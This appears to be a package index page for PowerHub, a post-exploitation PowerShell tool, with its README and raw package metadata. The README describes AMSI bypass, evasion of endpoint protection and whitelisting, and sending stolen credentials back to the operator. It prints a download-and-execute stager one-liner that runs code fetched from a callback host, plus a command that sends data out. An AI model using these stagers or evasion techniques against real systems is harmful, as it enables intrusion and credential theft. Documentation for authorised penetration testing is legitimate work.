PowerHub
========
PowerHub is a convenient post exploitation tool for PowerShell which aids a
pentester in transferring data, in particular code which may get flagged by
endpoint protection. Check out the
[Wiki](https://github.com/AdrianVollmer/PowerHub/wiki/)! Features:
* Fileless
* Stateless
* Cert pinning
* String "obfuscation" by RC4 encryption
* Choose your AMSI Bypass
* Transparent aliases for in-memory execution of C# programs
During an engagement where you have a test client available, one of the
first things you want to do is run SharpHound, Seatbelt, PowerUp,
Invoke-PrivescCheck or PowerSploit. So you need to download the files,
mess with endpoint protection, disable the execution policy, etc.
PowerHub provides an (almost) one-click-solution for this. Oh, and you can
also run arbitrary binaries (PE and shell code) entirely in-memory using
PowerSploit's modules, which is sometimes useful to bypass application
whitelisting.
Your loot (Kerberos tickets, passwords, etc.) can be easily transferred back
either as a file or a text snippet, via the command line or the web
interface. PowerHub also helps with collaboration in case you're a small
team.
Here is a simple example (grab information about local groups with PowerView
and transfer it back):
```powershell
PS C:\Users\avollmer> $K=New-Object Net.WebClient;'a=reflection','t=http'|%{IEX $K.DownloadString('http://192.168.11.2:8080/0?'+$_)}
True
_____ _____ _ _ _ _______ ______ _ _ _ _ ______
|_____] | | | | | |______ |_____/ |_____| | | |_____]
| |_____| |__|__| |______ | \_ | | |_____| |_____]
1.11 written by Adrian Vollmer, 2018-2022
Run 'Help-PowerHub' for help
PS C:\Users\avollmer> Get-HubModule PowerView
Name : /home/avollmer/.local/share/powerhub/modules/PowerSploit/Recon/PowerView.ps1
Type : ps1
N : 205
Loaded : True
Alias :
PS C:\Users\avollmer> Get-LocalGroup | PushTo-Hub -Name groups.json
```
Installation
============
PowerHub can be installed like any other Python package. Just execute
`python3 -m pip install powerhub`. If you like to work with virtual
environments, I recommend [pipx](https://github.com/pypa/pipx/).
If you want to use the latest version on the dev branch, clone this
repository and install with `python3 -m pip install -e .`.
For building the payloads, you need the MinGW GCC and Mono C# compilers. On
Debian-like systems, you can install them with `apt-get install mono-mcs
gcc-mingw-w64-x86-64 gcc-mingw-w64-i686`.
Usage
=====
PowerHub has one mandatory argument: the callback host (can be an IP
address). You should also use `--auth <user>:<pass>`, otherwise, a randomly
generated password will be used for basic authentication. The switch
`--no-auth` disables basic authentication which is *not recommended*. The
callback host name is used by the stager to download the payload. If the
callback port or path differ from the default, it can also be changed.
Read `powerhub --help` and the [Wiki](https://github.com/AdrianVollmer/PowerHub/wiki/Usage) for details.
Credits
=======
PowerHub is partially based on the awesome work of zc00l, @am0nsec, mar10,
p3nt4, @SkelSec. And of course, it would be nothing without @harmj0y,
@mattifestation and the many other contributors to
[PowerSploit](https://github.com/PowerShellMafia/PowerSploit).
Thanks!
Author
======
Adrian Vollmer, 2018-2022
Disclaimer
==========
Use at your own risk. Do not use without full consent of everyone involved.
For educational purposes only.
Raw data
{
"_id": null,
"home_page": "https://github.com/AdrianVollmer/PowerHub",
"name": "PowerHub",
"maintainer": "",
"docs_url": null,
"requires_python": ">=3",
"maintainer_email": "",
"keywords": "",
"author": "Adrian Vollmer",
"author_email": "",
"download_url": "https://files.pythonhosted.org/packages/b2/a1/1cf38ba90668af48f8eba9ee21650ae04eca17a2338e7325671fe79f47f0/PowerHub-1.11.post1.tar.gz",
"platform": null,
"description": "PowerHub\n========\n\nPowerHub is a convenient post exploitation tool for PowerShell which aids a\npentester in transferring data, in particular code which may get flagged by\nendpoint protection. Check out the\n[Wiki](https://github.com/AdrianVollmer/PowerHub/wiki/)! Features:\n\n* Fileless\n* Stateless\n* Cert pinning\n* String \"obfuscation\" by RC4 encryption\n* Choose your AMSI Bypass\n* Transparent aliases for in-memory execution of C# programs\n\n\n\n\n\nDuring an engagement where you have a test client available, one of the\nfirst things you want to do is run SharpHound, Seatbelt, PowerUp,\nInvoke-PrivescCheck or PowerSploit. So you need to download the files,\nmess with endpoint protection, disable the execution policy, etc.\nPowerHub provides an (almost) one-click-solution for this. Oh, and you can\nalso run arbitrary binaries (PE and shell code) entirely in-memory using\nPowerSploit's modules, which is sometimes useful to bypass application\nwhitelisting.\n\nYour loot (Kerberos tickets, passwords, etc.) can be easily transferred back\neither as a file or a text snippet, via the command line or the web\ninterface. PowerHub also helps with collaboration in case you're a small\nteam.\n\nHere is a simple example (grab information about local groups with PowerView\nand transfer it back):\n\n```powershell\nPS C:\\Users\\avollmer> $K=New-Object Net.WebClient;'a=reflection','t=http'|%{IEX $K.DownloadString('http://192.168.11.2:8080/0?'+$_)}\nTrue\n _____ _____ _ _ _ _______ ______ _ _ _ _ ______\n |_____] | | | | | |______ |_____/ |_____| | | |_____]\n | |_____| |__|__| |______ | \\_ | | |_____| |_____]\n1.11 written by Adrian Vollmer, 2018-2022\nRun 'Help-PowerHub' for help\nPS C:\\Users\\avollmer> Get-HubModule PowerView\n\n\nName : /home/avollmer/.local/share/powerhub/modules/PowerSploit/Recon/PowerView.ps1\nType : ps1\nN : 205\nLoaded : True\nAlias :\n\nPS C:\\Users\\avollmer> Get-LocalGroup | PushTo-Hub -Name groups.json\n```\n\n\nInstallation\n============\n\nPowerHub can be installed like any other Python package. Just execute\n`python3 -m pip install powerhub`. If you like to work with virtual\nenvironments, I recommend [pipx](https://github.com/pypa/pipx/).\n\nIf you want to use the latest version on the dev branch, clone this\nrepository and install with `python3 -m pip install -e .`.\n\nFor building the payloads, you need the MinGW GCC and Mono C# compilers. On\nDebian-like systems, you can install them with `apt-get install mono-mcs\ngcc-mingw-w64-x86-64 gcc-mingw-w64-i686`.\n\n\nUsage\n=====\n\nPowerHub has one mandatory argument: the callback host (can be an IP\naddress). You should also use `--auth <user>:<pass>`, otherwise, a randomly\ngenerated password will be used for basic authentication. The switch\n`--no-auth` disables basic authentication which is *not recommended*. The\ncallback host name is used by the stager to download the payload. If the\ncallback port or path differ from the default, it can also be changed.\n\nRead `powerhub --help` and the [Wiki](https://github.com/AdrianVollmer/PowerHub/wiki/Usage) for details.\n\n\nCredits\n=======\n\nPowerHub is partially based on the awesome work of zc00l, @am0nsec, mar10,\np3nt4, @SkelSec. And of course, it would be nothing without @harmj0y,\n@mattifestation and the many other contributors to\n[PowerSploit](https://github.com/PowerShellMafia/PowerSploit).\n\nThanks!\n\nAuthor\n======\n\nAdrian Vollmer, 2018-2022\n\nDisclaimer\n==========\n\nUse at your own risk. Do not use without full consent of everyone involved.\nFor educational purposes only.\n",
"bugtrack_url": null,
"license": "",
"summary": "A post exploitation tool based on a web application, focusing on bypassing endpoint protection and application whitelisting",
"version": "1.11.post1",
"split_keywords": [],
"urls": [
{
"comment_text": "",
"digests": {
"blake2b_256": "b2a11cf38ba90668af48f8eba9ee21650ae04eca17a2338e7325671fe79f47f0",
"md5": "64a3a54e543e268d0fb4d09711c85b34",
"sha256": "bbab86f3ba2341f4d91d5a3c0966c9b8ed741b4845e68c5239aa3877972f11c1"
},
"downloads": -1,
"filename": "PowerHub-1.11.post1.tar.gz",
"has_sig": false,
"md5_digest": "64a3a54e543e268d0fb4d09711c85b34",
"packagetype": "sdist",
"python_version": "source",
"requires_python": ">=3",
"size": 814974,
"upload_time": "2023-02-07T17:02:20",
"upload_time_iso_8601": "2023-02-07T17:02:20.983491Z",
"url": "https://files.pythonhosted.org/packages/b2/a1/1cf38ba90668af48f8eba9ee21650ae04eca17a2338e7325671fe79f47f0/PowerHub-1.11.post1.tar.gz",
"yanked": false,
"yanked_reason": null
}
],
"upload_time": "2023-02-07 17:02:20",
"github": true,
"gitlab": false,
"bitbucket": false,
"github_user": "AdrianVollmer",
"github_project": "PowerHub",
"travis_ci": false,
"coveralls": false,
"github_actions": false,
"requirements": [
{
"name": "cheroot",
"specs": []
},
{
"name": "cryptography",
"specs": []
},
{
"name": "Flask",
"specs": [
[
">=",
"1.0.2"
]
]
},
{
"name": "Flask-SocketIO",
"specs": [
[
">=",
"3.1.2"
]
]
},
{
"name": "flask-sqlalchemy",
"specs": [
[
">=",
"2.1"
],
[
"<",
"3.0"
]
]
},
{
"name": "pyOpenSSL",
"specs": []
},
{
"name": "pypykatz",
"specs": [
[
">=",
"0.2.2"
]
]
},
{
"name": "python-magic",
"specs": []
},
{
"name": "service_identity",
"specs": []
},
{
"name": "sqlalchemy",
"specs": [
[
"<",
"2.0"
]
]
},
{
"name": "twisted",
"specs": [
[
">=",
"18.9.0"
]
]
},
{
"name": "watchdog",
"specs": []
},
{
"name": "werkzeug",
"specs": [
[
">=",
"0.15"
]
]
},
{
"name": "wsgidav",
"specs": [
[
">=",
"3.0.0"
]
]
}
],
"tox": true,
"lcname": "powerhub"
}
JSON
